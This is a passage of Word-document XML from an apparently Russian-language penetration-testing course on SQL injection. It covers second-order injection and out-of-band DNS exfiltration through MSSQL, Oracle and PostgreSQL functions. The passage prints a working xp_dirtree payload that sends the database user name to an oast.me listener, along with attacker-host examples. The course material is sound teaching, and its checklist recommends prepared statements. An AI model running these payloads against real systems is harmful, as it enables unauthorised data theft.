          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Сформируйте пейлоад для регистрации пользователя, который при последующем вызове функции «Забыл пароль» приведет к раскрытию информации о версии БД через Time-based подход.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Рефлексия</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Подумайте, какие механизмы WAF могут пропустить такой пейлоад на этапе регистрации и как можно было бы настроить правила фильтрации для обнаружения подозрительных строк, которые не выглядят как немедленная атака.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Чек-лист ключевых идей</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Инъекция второго порядка — это двухэтапная атака: сохранение вредоносного кода и его последующая активация легитимным запросом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Доверие к данным из БД — главная причина уязвимости. База данных должна рассматриваться как недоверенный источник.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ищите точки входа там, где данные сохраняются надолго: профили, настройки, комментарии, метаданные файлов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Триггером атаки могут выступать фоновые задачи (cron), административные отчеты или системные логи.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Единственная надежная защита — повсеместное использование Prepared Statements для всех запросов, включая те, что используют данные из самой БД.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>В следующем уроке мы разберем еще более изощренный метод извлечения данных — Out-of-band (OOB) атаки. Мы научимся заставлять базу данных саму отправлять нам информацию через внешние протоколы DNS и HTTP, когда классические методы вывода заблокированы или неудобны.</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2  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Продвинутая эксфильтрация и экспертный аудит</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Изучить методы извлечения данных через внешние каналы и закрепить навыки проектирования безопасных систем.</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владеет техниками Out-of-band атак и методологией экспертного аудита кода для предотвращения SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Урок 2.1 — Продвинутые инъекции: Сложные сценарии и автоматизация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~9 мин · теория · практика</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Прорыв изоляции: Анатомия Out-of-band эксфильтрации</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Представьте, что вы пытаетесь вынести секретные чертежи из здания с вооруженной охраной на каждом выходе. Вы не можете вынести их в руках или карманах — обычные каналы вывода (HTTP-ответы сервера) тщательно проверяются WAF и системами предотвращения утечек. Однако у здания есть вентиляция, водопровод или сигнальные огни на крыше. Если вы сможете передать информацию через эти побочные каналы, охрана на дверях окажется бесполезной. В мире веб-безопасности такая техника называется Out-of-band (OOB) SQL-инъекцией.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Для пентестера уровня Middle это «золотой стандарт» эффективности. Когда классические методы Error-based не работают из-за подавления ошибок, а Blind-методы (Boolean или Time-based) превращаются в многочасовое ожидание и тысячи запросов, OOB позволяет извлечь данные одним точным ударом. Мы заставляем сервер базы данных не возвращать ответ приложению, а самостоятельно инициировать соединение с подконтрольным нам узлом, передавая украденные данные прямо в параметрах этого запроса.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Механика внешнего взаимодействия СУБД</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Суть OOB-атаки заключается в использовании встроенных функций СУБД, которые предназначены для взаимодействия с файловой системой или сетью. В современных инфраструктурах базы данных редко живут в вакууме: им нужно проверять сертификаты, обращаться к активным каталогам (LDAP) или загружать внешние XML-схемы. Именно эти легитимные возможности становятся рычагом для эксфильтрации. Самым универсальным и скрытным протоколом для этого является DNS.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS идеально подходит для обхода сетевых ограничений, так как запросы на разрешение доменных имен часто разрешены даже в самых жестких корпоративных сетях, где прямой HTTP-трафик наружу заблокирован. Когда вы внедряете в SQL-запрос функцию, пытающуюся разрешить имя вроде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>v3ry_s3cr3t_p4ssw0rd.attacker.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, запрос уходит на вышестоящий DNS-сервер, а затем попадает на ваш авторитарный сервер имен. База данных выступает в роли «курьера», который сам доставляет вам данные, не подозревая о компрометации.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Для успешной реализации атаки необходимо выполнение двух условий: наличие у СУБД прав на выполнение сетевых функций и отсутствие блокировки исходящего трафика на уровне сетевого экрана (Egress filtering). Несмотря на кажущуюся сложность настройки, OOB-атаки на порядок стабильнее Time-based методов, которые крайне чувствительны к сетевым задержкам и нагрузке на сервер, часто приводя к ложноотрицательным результатам.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Реализация для различных диалектов SQL</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждая СУБД имеет свои специфические «двери» для выхода во внешний мир. В Microsoft SQL Server классическим инструментом является процедура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>master..xp_dirtree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Хотя она предназначена для просмотра структуры папок, она поддерживает использование путей в формате UNC (Universal Naming Convention). Если передать ей путь вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\\data-to-steal.your-domain.com\a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, SQL Server инициирует DNS-запрос для поиска этого хоста, чтобы затем попытаться подключиться к нему по протоколу SMB.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В Oracle Database ситуация интереснее. Здесь часто используется пакет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UTL_HTTP</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DBMS_LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Однако даже если прямой доступ к ним ограничен, можно эксплуатировать функционал XML-парсеров. Функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>extractvalue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в сочетании с запросом к внешнему ресурсу через протокол HTTP или FTP позволяет не просто отправить данные, но и получить подтверждение доставки. Для атакующего это означает возможность выстраивать сложные цепочки извлечения данных, обходя ограничения на длину DNS-метки (которая не может превышать 63 символа).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL долгое время считался наиболее устойчивым к OOB, но расширения вроде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или специфические функции работы с файлами (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>copy</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lo_export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в сторону сетевых ресурсов) позволяют добиться аналогичного результата. Важно понимать, что в современных версиях СУБД многие из этих функций по умолчанию ограничены правами суперпользователя, поэтому успех OOB-атаки часто напрямую зависит от качества конфигурации прав доступа в целевой системе.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Подготовка инфраструктуры и работа с Interactsh</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для приема данных вам не обязательно поднимать собственный BIND-сервер и настраивать зоны. Существуют специализированные инструменты, такие как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Interactsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (от ProjectDiscovery) или классический </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Burp Collaborator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Они предоставляют готовый сервер, который слушает запросы по протоколам DNS, HTTP, SMTP и LDAP, мгновенно отображая входящие соединения в интерфейсе.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Типовой алгоритм действий выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вы генерируете уникальный домен (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c123.oast.me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Формируете полезную нагрузку, которая конкатенирует результат вашего целевого запроса с этим доменом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Отправляете запрос к уязвимому приложению.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Наблюдаете за панелью мониторинга.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Рассмотрим пример для MS SQL Server, где мы хотим извлечь имя текущего пользователя. Полезная нагрузка может выглядеть так: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DECLARE @p varchar(1024); SET @p = (SELECT USER_NAME()) + '.c123.oast.me'; EXEC('master..xp_dirtree "\\' + @p + '\a"');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Здесь мы сначала сохраняем данные в переменную, добавляем к ним наш домен и заставляем систему выполнить поиск этого «пути». В логах вашего DNS-слушателя появится запись о попытке разрешения имени </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>dbo.c123.oast.me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, что и будет являться искомым ответом.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Кейс: Обход слепой инъекции в высоконагруженной системе</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Представьте сценарий: вы обнаружили Blind SQL-инъекцию в API-методе крупного интернет-магазина. Попытки использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SLEEP()</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WAITFOR DELAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> дают нестабильный результат, так как время отклика сервера колеблется от 100мс до 5с из-за распродажи. Использование Boolean-based метода требует по 8 запросов на каждый символ, что при извлечении длинного хеша пароля создает подозрительную активность в логах.</w:t>
      </w:r>
    </w:p>
